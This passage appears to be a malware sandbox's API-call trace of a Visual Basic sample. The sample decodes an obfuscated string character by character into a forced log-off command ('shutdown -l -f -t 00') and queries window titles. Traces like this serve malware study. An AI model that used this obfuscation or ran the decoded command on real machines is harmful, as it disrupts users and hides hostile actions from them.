cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.938] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.939] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.939] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.940] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.940] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.941] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.941] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.942] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.942] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.942] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.943] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.943] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.943] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.944] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.944] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.945] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.947] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.947] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.948] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.948] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.948] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.949] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.949] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.950] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.950] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.951] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.951] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.952] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.952] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.952] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.953] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.953] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.954] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.954] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.955] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.955] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.955] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.955] GetForegroundWindow () returned 0x2035c [0201.956] GetLastError () returned 0x0 [0201.956] SysStringLen (param_1=" ") returned 0xff [0201.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.956] SysStringLen (param_1=" ") returned 0xff [0201.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.956] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.956] GetLastError () returned 0x0 [0201.956] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.957] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.957] SysStringLen (param_1="Des") returned 0x3 [0201.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Des", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Des", lpUsedDefaultChar=0x0) returned 4 [0201.957] SetWindowTextA (hWnd=0x103c4, lpString="Des") returned 1 [0201.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0201.958] GetFocus () returned 0x0 [0201.958] lstrlenA (lpString="Des") returned 3 [0201.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0201.958] IsWindow (hWnd=0x103c4) returned 1 [0201.958] IsWindow (hWnd=0x103c4) returned 1 [0201.959] IsWindow (hWnd=0x103c4) returned 1 [0201.959] IsWindow (hWnd=0x103c4) returned 1 [0201.959] GetFocus () returned 0x0 [0201.959] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0201.960] GetFocus () returned 0x0 [0201.960] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0201.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0201.960] GetFocus () returned 0x0 [0201.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Des", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0201.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Des", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Des") returned 4 [0201.960] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.960] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.011] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0202.011] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.012] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0202.012] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.013] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0202.013] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.013] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0202.014] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.014] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0202.015] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.015] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0202.015] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.016] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0202.016] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.017] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0202.017] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.018] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.018] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.018] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.019] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.019] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0202.020] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.020] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.020] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, 